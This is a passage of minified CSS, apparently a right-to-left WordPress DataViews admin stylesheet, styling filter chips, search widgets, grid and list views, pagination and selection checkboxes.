var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.dataviews-title-field button.components-button.is-link{color:#1e1e1e;display:block;font-weight:inherit;overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap;width:100%}.dataviews-title-field button.components-button.is-link:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable{color:#2f2f2f;cursor:pointer}.dataviews-title-field--clickable:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){overflow:hidden;padding:8px 0 0}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{padding-inline:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{padding-inline-start:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{padding-inline-end:24px}.dataviews-bulk-actions-footer__item-count{color:#1e1e1e;font-size:11px;font-weight:500;text-transform:uppercase}.dataviews-bulk-actions-footer__container{margin-left:auto;min-height:32px}.dataviews-filters__button{position:relative}.dataviews-filters__container{padding-top:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{opacity:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{opacity:1}.dataviews-filters__summary-popover{font-size:13px;line-height:1.4}.dataviews-filters__summary-popover .components-popover__content{border-radius:4px;max-width:250px;min-width:230px;width:100%}.dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{padding:0}.dataviews-filters__summary-operators-container{padding:8px 16px}.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){border-bottom:1px solid #e0e0e0}.dataviews-filters__summary-operators-container:empty{display:none}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{color:#757575;flex-shrink:0;max-width:calc(100% - 55px);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{overflow:hidden;white-space:nowrap;width:100%}.dataviews-filters__summary-chip-container{position:relative;white-space:pre-wrap}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{align-items:center;background:#f0f0f0;border:1px solid #0000;border-radius:16px;box-sizing:border-box;color:#2f2f2f;cursor:pointer;display:flex;min-height:32px;padding:4px 12px;position:relative}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{cursor:default}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{padding-inline-end:28px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{background:#e0e0e0;color:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{background:rgba(var(--wp-admin-theme-color--rgb),.04);color:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{background:rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{font-weight:500}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{align-items:center;background:#0000;border:0;border-radius:50%;cursor:pointer;display:flex;height:24px;justify-content:center;left:4px;padding:0;position:absolute;top:50%;transform:translateY(-50%);width:24px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{fill:#757575}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{background:#e0e0e0}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{fill:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{fill:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{background:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__search-widget-filter-combobox-list{border-top:1px solid #e0e0e0;max-height:184px;overflow:auto;padding:4px}.dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{font-weight:600}.dataviews-filters__search-widget-listbox{overflow:auto;padding:4px}.dataviews-filters__search-widget-listitem{align-items:center;border-radius:2px;box-sizing:border-box;cursor:default;display:flex;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;gap:8px;line-height:20px;min-height:32px;padding:4px 12px}.dataviews-filters__search-widget-listitem:last-child{margin-block-end:0}.dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{background-color:var(--wp-admin-theme-color);color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{background:#fff;border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{color:#757575;display:block;font-size:12px;line-height:16px;overflow:hidden;text-overflow:ellipsis}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{border:1px solid #1e1e1e;border-radius:50%;height:24px;margin-left:12px;max-width:24px;min-width:24px;position:relative;transition:none;width:24px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{height:16px;max-width:16px;min-width:16px;width:16px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{background-color:#fff;border:4px solid #fff;box-sizing:inherit;height:12px;margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{background:var(--wp-admin-theme-color);border:none}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{margin:0;padding:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{background-color:#fff;border:4px solid #fff;border-radius:50%;box-sizing:inherit;content:"";height:12px;margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:24px;border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;margin-left:12px;padding:6px 8px;transition:none}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{opacity:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{color:#fff;margin:-3px -5px}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{margin:-4px -5px 0 0}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{content:"\f460";display:inline-block;float:right;font:normal 30px/1 dashicons;vertical-align:middle;width:16px;speak:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{float:none;font-size:21px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{background:#f0f0f0;border-color:#ddd;cursor:default;opacity:1}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{background:#fff;color:#1e1e1e;height:var(--checkbox-size);margin:0;padding:0;position:relative;width:var(--checkbox-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:16px}}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:border-color .1s ease-in-out}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:var(--checkbox-size);fill:#fff;height:var(--checkmark-size);position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:var(--checkmark-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:calc(var(--checkbox-size) + 4px)}}.dataviews-filters__search-widget-filter-combobox__wrapper{padding:8px;position:relative}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{display:block;font-size:16px;height:32px;margin-left:0;margin-right:0;padding:0 32px 0 8px;width:100%}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{background:#fff;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{color:#757575}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{-webkit-appearance:none}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{align-items:center;bottom:0;display:flex;inset-inline-start:12px;justify-content:center;position:absolute;top:0;width:24px}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){transform:scaleX(-1)}.dataviews-filters__container-visibility-toggle{flex-shrink:0;position:relative}.dataviews-filters-toggle__count{background:var(--wp-admin-theme-color,#3858e9);border-radius:8px;box-sizing:border-box;color:#fff;font-size:11px;height:16px;left:0;line-height:16px;min-width:16px;outline:var(--wp-admin-border-width-focus) solid #fff;padding:0 4px;position:absolute;text-align:center;top:0;transform:translate(-50%,-50%)}.dataviews-search{width:fit-content}.dataviews-filters__user-input-widget{padding:16px}.dataviews-filters__user-input-widget .components-input-control__prefix{padding-right:8px}.dataviews-filters__search-widget-no-elements{align-items:center;display:flex;justify-content:center;padding:16px}.dataviews-footer{background-color:#fff;border-top:1px solid #f0f0f0;bottom:0;flex-shrink:0;padding:12px 48px;position:sticky;right:0}@media not (prefers-reduced-motion){.dataviews-footer{transition:padding .1s ease-out}}.dataviews-footer{z-index:2}@container (max-width: 430px){.dataviews-footer{padding:12px 24px}}@container (max-width: 560px){.dataviews-footer{flex-direction:column!important}.dataviews-footer .dataviews-bulk-actions-footer__container{width:100%}.dataviews-footer .dataviews-bulk-actions-footer__item-count{flex-grow:1}.dataviews-footer .dataviews-pagination{justify-content:space-between;width:100%}}.dataviews-pagination__page-select{font-size:11px;font-weight:500;text-transform:uppercase}@media (min-width:600px){.dataviews-pagination__page-select .components-select-control__input{font-size:11px!important;font-weight:500}}.dataviews-action-modal{z-index:1000001}.dataviews-picker-footer__bulk-selection{align-self:flex-start;height:32px}.dataviews-picker-footer__actions{align-self:flex-end}.dataviews-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-selection-checkbox{--checkbox-input-size:16px}}.dataviews-selection-checkbox{flex-shrink:0;line-height:0}.dataviews-selection-checkbox .components-checkbox-control__input-container{margin:0}.dataviews-view-config{container-type:inline-size;font-size:13px;line-height:1.4;width:320px}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{height:100%;overflow-y:scroll}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{width:auto}.dataviews-view-config__sort-direction .components-toggle-group-control-option-base{text-transform:uppercase}.dataviews-settings-section__title.dataviews-settings-section__title{font-size:15px;line-height:24px}.dataviews-settings-section__sidebar{grid-column:span 4}.dataviews-settings-section__content,.dataviews-settings-section__content>*{grid-column:span 8}.dataviews-settings-section__content .is-divided-in-two{display:contents}.dataviews-settings-section__content .is-divided-in-two>*{grid-column:span 4}.dataviews-settings-section:has(.dataviews-settings-section__content:empty){display:none}@container (max-width: 500px){.dataviews-settings-section.dataviews-settings-section{grid-template-columns:repeat(2,1fr)}.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{grid-column:span 2}}.dataviews-field-control__field{height:32px}.dataviews-field-control__actions{position:absolute;top:-9999em}.dataviews-field-control__actions.dataviews-field-control__actions{gap:4px}.dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{position:unset;top:unset}.dataviews-field-control__icon{display:flex;width:24px}.dataviews-field-control__label-sub-label-container{flex-grow:1}.dataviews-field-control__label{display:block}.dataviews-field-control__sub-label{color:#757575;font-size:11px;font-style:normal;margin-bottom:0;margin-top:8px}.dataviews-view-grid-items{container-type:inline-size;display:grid;gap:32px;grid-template-columns:repeat(auto-fill,minmax(230px,1fr));grid-template-rows:max-content;margin-bottom:auto;padding:0 48px 24px}@container (max-width: 430px){.dataviews-view-grid-items{padding-left:24px;padding-right:24px}}@media not (prefers-reduced-motion){.dataviews-view-grid-items{transition:padding .1s ease-out}}.dataviews-view-grid .dataviews-view-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{padding:8px 0 4px}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{width:fit-content}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{color:#1e1e1e}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;overflow:hidden;position:relative;width:100%}.dataviews-view-grid .dataviews-view-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-grid .dataviews-view-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;pointer-events:none;position:absolute;right:0;top:0;width:100%}.dataviews-view-grid .dataviews-view-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-grid .dataviews-view-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{align-items:center;min-height:24px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){display:none}.dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{display:none}.dataviews-view-grid__card .dataviews-selection-checkbox{opacity:0;position:absolute;right:8px;top:-9999em;z-index:1}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-selection-checkbox{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-selection-checkbox{opacity:1;top:8px}}.dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{opacity:1;top:8px}.dataviews-view-grid__card .dataviews-view-grid__media-actions{left:4px;opacity:0;position:absolute;top:4px}.dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{background-color:#fff}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-view-grid__media-actions{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-view-grid__media-actions{opacity:1;top:4px}}.dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{opacity:1}.dataviews-view-grid__media--clickable{cursor:pointer}.dataviews-view-grid__group-header{color:#1e1e1e;container-type:inline-size;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}@container (max-width: 430px){.dataviews-view-grid__group-header{padding-left:24px;padding-right:24px}}div.dataviews-view-list{list-style-type:none}.dataviews-view-list{margin:0 0 auto}.dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{border-top:1px solid #f0f0f0;margin:0}.dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{box-sizing:border-box;padding:16px 24px;position:relative}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{display:flex;flex:0 0 auto;gap:4px;white-space:nowrap;width:max-content}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{position:relative;z-index:1}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{height:24px}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex:0;overflow:hidden;width:0}.dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}@media (hover:none){.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}}.dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{color:#1e1e1e}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{background-color:#f8f8f8;color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#1e1e1e}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected 